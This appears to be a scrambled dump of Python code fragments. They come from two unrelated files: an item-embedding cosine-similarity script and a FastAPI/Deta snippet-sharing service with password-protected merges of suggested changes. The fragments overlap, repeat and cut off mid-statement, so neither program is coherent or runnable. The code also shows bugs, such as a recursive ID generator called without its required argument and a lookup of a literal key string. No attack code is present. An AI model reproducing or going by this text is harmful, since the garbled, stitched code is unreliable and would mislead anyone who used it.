linenum = 0 item_vec = {} fp", "itemid:fixed itemid to clac item sim output_file: the file to store result \"\"\"", "output_file): \"\"\" Args item_vec:item embedding vector itemid:fixed itemid to clac item sim output_file:", "item_vec: return score = {} topk = 10 fix_item_vec = item_vec[itemid] for tmp_itemid", "itemid: continue tmp_itemvec = item_vec[tmp_itemid] fenmu = np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec) if fenmu ==", "(\"usage: python xx.py inputfile outputfile\") sys.exit() else: inputfile = sys.argv[1] outputfile = sys.argv[2]", "< 129: continue itemid = item[0] if itemid == \"</s>\": continue item_vec[itemid] =", "\";\".join(tmp_list) fw.write(out_str + \"\\n\") fw.close() def run_main(input_file, output_file): item_vec = load_item_vec(input_file) cal_item_sim(item_vec, \"27\",", "item_vec[itemid] for tmp_itemid in item_vec: if tmp_itemid == itemid: continue tmp_itemvec = item_vec[tmp_itemid]", "fp.close() return item_vec def cal_item_sim(item_vec, itemid, output_file): \"\"\" Args item_vec:item embedding vector itemid:fixed", "fw = open(output_file, \"w+\") out_str = itemid + \"\\t\" tmp_list = [] for", "produce item sim file \"\"\" import os import numpy as np import operator", "\"\"\" Args: input_file: item vec file Return: dict key:itemid value:np.array([num1, num2....]) \"\"\" if", "for zuhe in sorted(score.iteritems(), key = operator.itemgetter(1), reverse = True)[:topk]: tmp_list.append(zuhe[0] + \"_\"", "+ \"_\" + str(zuhe[1])) out_str += \";\".join(tmp_list) fw.write(out_str + \"\\n\") fw.close() def run_main(input_file,", "= line.strip().split() if len(item) < 129: continue itemid = item[0] if itemid ==", "num2....]) \"\"\" if not os.path.exists(input_file): return {} linenum = 0 item_vec = {}", "Return: dict key:itemid value:np.array([num1, num2....]) \"\"\" if not os.path.exists(input_file): return {} linenum =", "\"\\n\") fw.close() def run_main(input_file, output_file): item_vec = load_item_vec(input_file) cal_item_sim(item_vec, \"27\", output_file) if __name__", "tmp_itemvec = item_vec[tmp_itemid] fenmu = np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec) if fenmu == 0: score[tmp_itemid]", "in item_vec: return score = {} topk = 10 fix_item_vec = item_vec[itemid] for", "def load_item_vec(input_file): \"\"\" Args: input_file: item vec file Return: dict key:itemid value:np.array([num1, num2....])", "continue item = line.strip().split() if len(item) < 129: continue itemid = item[0] if", "not os.path.exists(input_file): return {} linenum = 0 item_vec = {} fp = open(input_file)", "run_main(input_file, output_file): item_vec = load_item_vec(input_file) cal_item_sim(item_vec, \"27\", output_file) if __name__ == \"__main__\": if", "= open(output_file, \"w+\") out_str = itemid + \"\\t\" tmp_list = [] for zuhe", "xx.py inputfile outputfile\") sys.exit() else: inputfile = sys.argv[1] outputfile = sys.argv[2] run_main(inputfile, outputfile)", "item_vec[itemid] = np.array([float(ele) for ele in item[1:]]) fp.close() return item_vec def cal_item_sim(item_vec, itemid,", "import sys def load_item_vec(input_file): \"\"\" Args: input_file: item vec file Return: dict key:itemid", "\"</s>\": continue item_vec[itemid] = np.array([float(ele) for ele in item[1:]]) fp.close() return item_vec def", "{} topk = 10 fix_item_vec = item_vec[itemid] for tmp_itemid in item_vec: if tmp_itemid", "item sim file \"\"\" import os import numpy as np import operator import", "if len(sys.argv) < 3: print (\"usage: python xx.py inputfile outputfile\") sys.exit() else: inputfile", "3: print (\"usage: python xx.py inputfile outputfile\") sys.exit() else: inputfile = sys.argv[1] outputfile", "#-*-coding:utf8-*- \"\"\" author:zhiyuan date:2019 produce item sim file \"\"\" import os import numpy", "in fp: if linenum == 0: linenum += 1 continue item = line.strip().split()", "= load_item_vec(input_file) cal_item_sim(item_vec, \"27\", output_file) if __name__ == \"__main__\": if len(sys.argv) < 3:", "itemid == \"</s>\": continue item_vec[itemid] = np.array([float(ele) for ele in item[1:]]) fp.close() return", "[] for zuhe in sorted(score.iteritems(), key = operator.itemgetter(1), reverse = True)[:topk]: tmp_list.append(zuhe[0] +", "tmp_list.append(zuhe[0] + \"_\" + str(zuhe[1])) out_str += \";\".join(tmp_list) fw.write(out_str + \"\\n\") fw.close() def", "item vec file Return: dict key:itemid value:np.array([num1, num2....]) \"\"\" if not os.path.exists(input_file): return", "item[1:]]) fp.close() return item_vec def cal_item_sim(item_vec, itemid, output_file): \"\"\" Args item_vec:item embedding vector", "output_file) if __name__ == \"__main__\": if len(sys.argv) < 3: print (\"usage: python xx.py", "output_file: the file to store result \"\"\" if itemid not in item_vec: return", "linenum = 0 item_vec = {} fp = open(input_file) for line in fp:", "if itemid not in item_vec: return score = {} topk = 10 fix_item_vec", "load_item_vec(input_file) cal_item_sim(item_vec, \"27\", output_file) if __name__ == \"__main__\": if len(sys.argv) < 3: print", "to store result \"\"\" if itemid not in item_vec: return score = {}", "= {} fp = open(input_file) for line in fp: if linenum == 0:", "= 0 else: score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3) fw = open(output_file, \"w+\") out_str", "= open(input_file) for line in fp: if linenum == 0: linenum += 1", "0: score[tmp_itemid] = 0 else: score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3) fw = open(output_file,", "for ele in item[1:]]) fp.close() return item_vec def cal_item_sim(item_vec, itemid, output_file): \"\"\" Args", "open(output_file, \"w+\") out_str = itemid + \"\\t\" tmp_list = [] for zuhe in", "= itemid + \"\\t\" tmp_list = [] for zuhe in sorted(score.iteritems(), key =", "sorted(score.iteritems(), key = operator.itemgetter(1), reverse = True)[:topk]: tmp_list.append(zuhe[0] + \"_\" + str(zuhe[1])) out_str", "\"\\t\" tmp_list = [] for zuhe in sorted(score.iteritems(), key = operator.itemgetter(1), reverse =", "continue item_vec[itemid] = np.array([float(ele) for ele in item[1:]]) fp.close() return item_vec def cal_item_sim(item_vec,", "for line in fp: if linenum == 0: linenum += 1 continue item", "if not os.path.exists(input_file): return {} linenum = 0 item_vec = {} fp =", "= np.array([float(ele) for ele in item[1:]]) fp.close() return item_vec def cal_item_sim(item_vec, itemid, output_file):", "import numpy as np import operator import sys def load_item_vec(input_file): \"\"\" Args: input_file:", "item_vec def cal_item_sim(item_vec, itemid, output_file): \"\"\" Args item_vec:item embedding vector itemid:fixed itemid to", "== itemid: continue tmp_itemvec = item_vec[tmp_itemid] fenmu = np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec) if fenmu", "\"\"\" Args item_vec:item embedding vector itemid:fixed itemid to clac item sim output_file: the", "fenmu == 0: score[tmp_itemid] = 0 else: score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3) fw", "in sorted(score.iteritems(), key = operator.itemgetter(1), reverse = True)[:topk]: tmp_list.append(zuhe[0] + \"_\" + str(zuhe[1]))", "item_vec[tmp_itemid] fenmu = np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec) if fenmu == 0: score[tmp_itemid] = 0", "sim file \"\"\" import os import numpy as np import operator import sys", "store result \"\"\" if itemid not in item_vec: return score = {} topk", "tmp_itemid in item_vec: if tmp_itemid == itemid: continue tmp_itemvec = item_vec[tmp_itemid] fenmu =", "if __name__ == \"__main__\": if len(sys.argv) < 3: print (\"usage: python xx.py inputfile" ]
[ "for i in range(2)) key = f\"{alpha}{digits}\" if get_change(snippet_id, f\"{alpha}{digits}\"): return gen_change_id() return", "= open(\"snipz.css\").read() return Response(content=css, media_type=\"text/css\") @app.post(\"/create_snippet\") async def make_snippet(new_snip: Snippet): snip_dict = new_snip.dict()", "change: Change): try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict() snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict())", "App(fast) snippets = Database(\"snippets\") pwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\") def verify_password(plain_password, hashed_password): return pwd_context.verify(plain_password,", "FastAPI: # https://fastapi.tiangolo.com/ # suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030 # review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 # main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 #", "change_id): try: changes = snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change = changes[\"change_id\"] return change except KeyError: return", "= changes[\"change_id\"] return change except KeyError: return None def gen_change_id(snippet_id): alpha = \"\".join(secrets.choice(string.ascii_lowercase)", "import App, Database from fastapi.responses import HTMLResponse from deta.lib.responses import JSON from fastapi", "snip_id: str = gen_id() proposed_changes: dict = {} history: list = [] password:", "= event.json.get(\"key\") val = get_snippet(key) return val def gen_id(): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for", "for i in range(4)) key = f\"{alpha}-{digits}\" if get_snippet(key): return gen_id() return key", "main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 # snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast =", "= App(fast) snippets = Database(\"snippets\") pwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\") def verify_password(plain_password, hashed_password): return", "deta.lib.responses import JSON from fastapi import FastAPI, Response from fastapi.middleware.cors import CORSMiddleware from", "\"<PASSWORD>\" class Password(BaseModel): password: str class SnipInDB(Snippet): hashed_password: str class Change(BaseModel): code: str", "async def merge_change(snippet_id: str, change_id: str, password: Password): if not authenticate_merge(snippet_id, password.password): return", "snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(suggest_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"} @app.post(\"/snippets/{snippet_id}/changes\")", "return None @app.lib.run(\"snipper\") def snip_handler(event): key = event.json.get(\"key\") val = get_snippet(key) return val", "fast = FastAPI() app = App(fast) snippets = Database(\"snippets\") pwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\")", "class Change(BaseModel): code: str def authenticate_merge(snip_id: str, password: str): snippet = get_snippet(snip_id) if", "def get_change(snippet_id, change_id): try: changes = snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change = changes[\"change_id\"] return change except", "except KeyError: return {\"error\": \"no such snippet\"} @app.get(\"/snippets/{snippet_id}/review\") async def review_snippet(snippet_id: str): try:", "= \"\".join(secrets.choice(string.ascii_lowercase) for i in range(4)) digits = \"\".join(secrets.choice(string.digits) for i in range(4))", "password: str): snippet = get_snippet(snip_id) if not snippet: return False else: snippet =", "main_handler(): css = open(\"snipz.css\").read() return Response(content=css, media_type=\"text/css\") @app.post(\"/create_snippet\") async def make_snippet(new_snip: Snippet): snip_dict", "str): try: review_template = Template((open(\"review.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError: return", "= open(\"main.html\").read() return HTMLResponse(main) @app.get(\"/snipz.css\") def main_handler(): css = open(\"snipz.css\").read() return Response(content=css, media_type=\"text/css\")", "HTMLResponse(suggest_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"} @app.post(\"/snippets/{snippet_id}/changes\") async def suggest_change(snippet_id: str,", "for i in range(4)) digits = \"\".join(secrets.choice(string.digits) for i in range(4)) key =", "str = \"<PASSWORD>\" class Password(BaseModel): password: str class SnipInDB(Snippet): hashed_password: str class Change(BaseModel):", "= change.code del snippet.proposed_changes[change_id] snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no", "Change(BaseModel): code: str def authenticate_merge(snip_id: str, password: str): snippet = get_snippet(snip_id) if not", "i in range(2)) digits = \"\".join(secrets.choice(string.digits) for i in range(2)) key = f\"{alpha}{digits}\"", "return pwd_context.verify(plain_password, hashed_password) def get_password_hash(password): return pwd_context.hash(password) def get_snippet(snip_id): try: snippet = snippets.get(snip_id)[\"data\"]", "HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def merge_change(snippet_id: str,", "= CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\") def verify_password(plain_password, hashed_password): return pwd_context.verify(plain_password, hashed_password) def get_password_hash(password): return pwd_context.hash(password)", "not authenticate_merge(snippet_id, password.password): return {\"error\": \"Invalid merge password\"} try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) change", "for i in range(2)) digits = \"\".join(secrets.choice(string.digits) for i in range(2)) key =", "from deta.lib import App, Database from fastapi.responses import HTMLResponse from deta.lib.responses import JSON", "= {} history: list = [] password: str = \"<PASSWORD>\" class Password(BaseModel): password:", "\"no such snippet\"} @app.get(\"/snippets/{snippet_id}/review\") async def review_snippet(snippet_id: str): try: review_template = Template((open(\"review.html\").read())) snippet", "suggest_template = Template((open(\"suggest.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(suggest_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no", "return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such snippet\"} @app.get(\"/snippets/{snippet_id}/review\") async def review_snippet(snippet_id:", "Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async def show_snippet(snippet_id: str): try: suggest_template = Template((open(\"suggest.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict()", "return gen_change_id() return key class Snippet(BaseModel): name: str code: str snip_id: str =", "def snip_handler(event): key = event.json.get(\"key\") val = get_snippet(key) return val def gen_id(): alpha", "str, change_id: str, password: Password): if not authenticate_merge(snippet_id, password.password): return {\"error\": \"Invalid merge", "snippet: return False else: snippet = SnipInDB(**snippet) if not verify_password(password, snippet.hashed_password): return False", "KeyError: return None def gen_change_id(snippet_id): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(2)) digits", "del snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict) del snip_dict[\"hashed_password\"] return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async def show_snippet(snippet_id: str):", "if get_change(snippet_id, f\"{alpha}{digits}\"): return gen_change_id() return key class Snippet(BaseModel): name: str code: str", "change.code del snippet.proposed_changes[change_id] snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such", "snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) change = Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code) snippet.code = change.code del snippet.proposed_changes[change_id] snippets.put(snippet_id,", "[] password: str = \"<PASSWORD>\" class Password(BaseModel): password: str class SnipInDB(Snippet): hashed_password: str", "key def get_change(snippet_id, change_id): try: changes = snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change = changes[\"change_id\"] return change", "key = f\"{alpha}-{digits}\" if get_snippet(key): return gen_id() return key def get_change(snippet_id, change_id): try:", "snippet.history.append(snippet.code) snippet.code = change.code del snippet.proposed_changes[change_id] snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return", "make_snippet(new_snip: Snippet): snip_dict = new_snip.dict() snip_dict[\"hashed_password\"] = get_password_hash(new_snip.password) del snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict) del", "snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict() snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return", "snippet.proposed_changes[change_id] snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such snippet\"} @app.lib.run()", "code: str snip_id: str = gen_id() proposed_changes: dict = {} history: list =", "{\"error\": \"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def merge_change(snippet_id: str, change_id: str, password: Password):", "False else: snippet = SnipInDB(**snippet) if not verify_password(password, snippet.hashed_password): return False return True", "is a regular FastAPI app. Read the docs of FastAPI: # https://fastapi.tiangolo.com/ #", "\"\".join(secrets.choice(string.ascii_lowercase) for i in range(4)) digits = \"\".join(secrets.choice(string.digits) for i in range(4)) key", "change.dict() snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such snippet\"} @app.get(\"/snippets/{snippet_id}/review\")", "Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code) snippet.code = change.code del snippet.proposed_changes[change_id] snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError:", "suggest_change(snippet_id: str, change: Change): try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict() snippets.put(snippet_id, snippet.dict())", "if get_snippet(key): return gen_id() return key def get_change(snippet_id, change_id): try: changes = snippets.get(snippet_id)[\"data\"][\"proposed_changes\"]", "hashed_password) def get_password_hash(password): return pwd_context.hash(password) def get_snippet(snip_id): try: snippet = snippets.get(snip_id)[\"data\"] return snippet", "Template((open(\"suggest.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(suggest_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"}", "= f\"{alpha}-{digits}\" if get_snippet(key): return gen_id() return key def get_change(snippet_id, change_id): try: changes", "CryptContext from pydantic import BaseModel from jinja2 import Template # This is a", "open(\"snipz.css\").read() return Response(content=css, media_type=\"text/css\") @app.post(\"/create_snippet\") async def make_snippet(new_snip: Snippet): snip_dict = new_snip.dict() snip_dict[\"hashed_password\"]", "{\"error\": \"no such snippet\"} @app.get(\"/snippets/{snippet_id}/review\") async def review_snippet(snippet_id: str): try: review_template = Template((open(\"review.html\").read()))", "import JSON from fastapi import FastAPI, Response from fastapi.middleware.cors import CORSMiddleware from passlib.context", "# This is a regular FastAPI app. Read the docs of FastAPI: #", "in range(2)) digits = \"\".join(secrets.choice(string.digits) for i in range(2)) key = f\"{alpha}{digits}\" if", "return HTMLResponse(main) @app.get(\"/snipz.css\") def main_handler(): css = open(\"snipz.css\").read() return Response(content=css, media_type=\"text/css\") @app.post(\"/create_snippet\") async", "merge password\"} try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) change = Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code) snippet.code = change.code", "https://cclwqvx4995d.deta.dev/snippets/chek-0030 # review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 # main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 # snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045", "str, password: Password): if not authenticate_merge(snippet_id, password.password): return {\"error\": \"Invalid merge password\"} try:", "\"\".join(secrets.choice(string.digits) for i in range(2)) key = f\"{alpha}{digits}\" if get_change(snippet_id, f\"{alpha}{digits}\"): return gen_change_id()", "f\"{alpha}{digits}\" if get_change(snippet_id, f\"{alpha}{digits}\"): return gen_change_id() return key class Snippet(BaseModel): name: str code:", "password: str class SnipInDB(Snippet): hashed_password: str class Change(BaseModel): code: str def authenticate_merge(snip_id: str,", "HTMLResponse(main) @app.get(\"/snipz.css\") def main_handler(): css = open(\"snipz.css\").read() return Response(content=css, media_type=\"text/css\") @app.post(\"/create_snippet\") async def", "https://fastapi.tiangolo.com/ # suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030 # review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 # main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 # snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460", "change = Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code) snippet.code = change.code del snippet.proposed_changes[change_id] snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict())", "review_template = Template((open(\"review.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no", "except KeyError: return None def gen_change_id(snippet_id): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(2))", "BaseModel from jinja2 import Template # This is a regular FastAPI app. Read", "True @app.get(\"/\") def main_handler(): main = open(\"main.html\").read() return HTMLResponse(main) @app.get(\"/snipz.css\") def main_handler(): css", "return {\"error\": \"no such snippet\"} @app.lib.run() def handler(event): return len(snippets.all()) @app.lib.run(action=\"del_snip\") def handler(event):", "@app.get(\"/snippets/{snippet_id}/review\") async def review_snippet(snippet_id: str): try: review_template = Template((open(\"review.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return", "SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict() snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no", "get_snippet(snip_id): try: snippet = snippets.get(snip_id)[\"data\"] return snippet except KeyError: return None @app.lib.run(\"snipper\") def", "https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 # snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460 # main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045 # README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast = FastAPI()", "gen_id(): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(4)) digits = \"\".join(secrets.choice(string.digits) for i", "pwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\") def verify_password(plain_password, hashed_password): return pwd_context.verify(plain_password, hashed_password) def get_password_hash(password): return", "password\"} try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) change = Change(**snippet.proposed_changes[change_id]) snippet.history.append(snippet.code) snippet.code = change.code del", "return Response(content=css, media_type=\"text/css\") @app.post(\"/create_snippet\") async def make_snippet(new_snip: Snippet): snip_dict = new_snip.dict() snip_dict[\"hashed_password\"] =", "get_password_hash(new_snip.password) del snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict) del snip_dict[\"hashed_password\"] return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async def show_snippet(snippet_id:", "import secrets, string from deta.lib import App, Database from fastapi.responses import HTMLResponse from", "snippet\"} @app.post(\"/snippets/{snippet_id}/changes\") async def suggest_change(snippet_id: str, change: Change): try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)]", "fastapi import FastAPI, Response from fastapi.middleware.cors import CORSMiddleware from passlib.context import CryptContext from", "code: str def authenticate_merge(snip_id: str, password: str): snippet = get_snippet(snip_id) if not snippet:", "snip_dict[\"hashed_password\"] = get_password_hash(new_snip.password) del snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict) del snip_dict[\"hashed_password\"] return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async", "changes = snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change = changes[\"change_id\"] return change except KeyError: return None def", "# https://fastapi.tiangolo.com/ # suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030 # review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775 # main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512 # snipz.css:", "async def show_snippet(snippet_id: str): try: suggest_template = Template((open(\"suggest.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(suggest_template.render(snippet_data=snippet))", "Template # This is a regular FastAPI app. Read the docs of FastAPI:", "return {\"error\": \"no such snippet\"} @app.get(\"/snippets/{snippet_id}/review\") async def review_snippet(snippet_id: str): try: review_template =", "= Template((open(\"suggest.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(suggest_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such", "def main_handler(): css = open(\"snipz.css\").read() return Response(content=css, media_type=\"text/css\") @app.post(\"/create_snippet\") async def make_snippet(new_snip: Snippet):", "def make_snippet(new_snip: Snippet): snip_dict = new_snip.dict() snip_dict[\"hashed_password\"] = get_password_hash(new_snip.password) del snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict)", "except KeyError: return {\"error\": \"no such snippet\"} @app.patch(\"/snippets/{snippet_id}/merge/{change_id}\") async def merge_change(snippet_id: str, change_id:", "Database from fastapi.responses import HTMLResponse from deta.lib.responses import JSON from fastapi import FastAPI,", "This is a regular FastAPI app. Read the docs of FastAPI: # https://fastapi.tiangolo.com/", "snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such snippet\"} @app.get(\"/snippets/{snippet_id}/review\") async", "list = [] password: str = \"<PASSWORD>\" class Password(BaseModel): password: str class SnipInDB(Snippet):", "password.password): return {\"error\": \"Invalid merge password\"} try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) change = Change(**snippet.proposed_changes[change_id])", "class Password(BaseModel): password: str class SnipInDB(Snippet): hashed_password: str class Change(BaseModel): code: str def", "https://cclwqvx4995d.deta.dev/snippets/oulg-9883 fast = FastAPI() app = App(fast) snippets = Database(\"snippets\") pwd_context = CryptContext(schemes=[\"bcrypt\"],", "string from deta.lib import App, Database from fastapi.responses import HTMLResponse from deta.lib.responses import", "snippet\"} @app.get(\"/snippets/{snippet_id}/review\") async def review_snippet(snippet_id: str): try: review_template = Template((open(\"review.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict()", "from passlib.context import CryptContext from pydantic import BaseModel from jinja2 import Template #", "try: changes = snippets.get(snippet_id)[\"data\"][\"proposed_changes\"] change = changes[\"change_id\"] return change except KeyError: return None", "i in range(2)) key = f\"{alpha}{digits}\" if get_change(snippet_id, f\"{alpha}{digits}\"): return gen_change_id() return key", "review_snippet(snippet_id: str): try: review_template = Template((open(\"review.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(review_template.render(snippet_data=snippet)) except KeyError:", "return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async def show_snippet(snippet_id: str): try: suggest_template = Template((open(\"suggest.html\").read())) snippet =", "Database(\"snippets\") pwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\") def verify_password(plain_password, hashed_password): return pwd_context.verify(plain_password, hashed_password) def get_password_hash(password):", "from fastapi import FastAPI, Response from fastapi.middleware.cors import CORSMiddleware from passlib.context import CryptContext", "pydantic import BaseModel from jinja2 import Template # This is a regular FastAPI", "alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(4)) digits = \"\".join(secrets.choice(string.digits) for i in", "def authenticate_merge(snip_id: str, password: str): snippet = get_snippet(snip_id) if not snippet: return False", "alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(2)) digits = \"\".join(secrets.choice(string.digits) for i in", "None @app.lib.run(\"snipper\") def snip_handler(event): key = event.json.get(\"key\") val = get_snippet(key) return val def", "= get_password_hash(new_snip.password) del snip_dict[\"password\"] snippets.put(new_snip.snip_id, snip_dict) del snip_dict[\"hashed_password\"] return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async def", "media_type=\"text/css\") @app.post(\"/create_snippet\") async def make_snippet(new_snip: Snippet): snip_dict = new_snip.dict() snip_dict[\"hashed_password\"] = get_password_hash(new_snip.password) del", "app = App(fast) snippets = Database(\"snippets\") pwd_context = CryptContext(schemes=[\"bcrypt\"], deprecated=\"auto\") def verify_password(plain_password, hashed_password):", "not snippet: return False else: snippet = SnipInDB(**snippet) if not verify_password(password, snippet.hashed_password): return", "range(4)) digits = \"\".join(secrets.choice(string.digits) for i in range(4)) key = f\"{alpha}-{digits}\" if get_snippet(key):", "Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(suggest_template.render(snippet_data=snippet)) except KeyError: return {\"error\": \"no such snippet\"} @app.post(\"/snippets/{snippet_id}/changes\") async def", "get_snippet(key) return val def gen_id(): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(4)) digits", "str): try: suggest_template = Template((open(\"suggest.html\").read())) snippet = Snippet(**snippets.get(snippet_id)[\"data\"]).dict() return HTMLResponse(suggest_template.render(snippet_data=snippet)) except KeyError: return", "import CORSMiddleware from passlib.context import CryptContext from pydantic import BaseModel from jinja2 import", "= \"<PASSWORD>\" class Password(BaseModel): password: str class SnipInDB(Snippet): hashed_password: str class Change(BaseModel): code:", "Change): try: snippet = SnipInDB(**snippets.get(snippet_id)[\"data\"]) snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict() snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except", "snippet.hashed_password): return False return True @app.get(\"/\") def main_handler(): main = open(\"main.html\").read() return HTMLResponse(main)", "def gen_id(): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(4)) digits = \"\".join(secrets.choice(string.digits) for", "snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such snippet\"} @app.get(\"/snippets/{snippet_id}/review\") async def", "snippets.put(new_snip.snip_id, snip_dict) del snip_dict[\"hashed_password\"] return Snippet(**snip_dict) @app.get(\"/snippets/{snippet_id}\") async def show_snippet(snippet_id: str): try: suggest_template", "from fastapi.middleware.cors import CORSMiddleware from passlib.context import CryptContext from pydantic import BaseModel from", "None def gen_change_id(snippet_id): alpha = \"\".join(secrets.choice(string.ascii_lowercase) for i in range(2)) digits = \"\".join(secrets.choice(string.digits)", "snippet.code = change.code del snippet.proposed_changes[change_id] snippets.put(snippet_id, snippet.dict()) return Snippet(**snippet.dict()) except KeyError: return {\"error\":", "Snippet(**snippet.dict()) except KeyError: return {\"error\": \"no such snippet\"} @app.get(\"/snippets/{snippet_id}/review\") async def 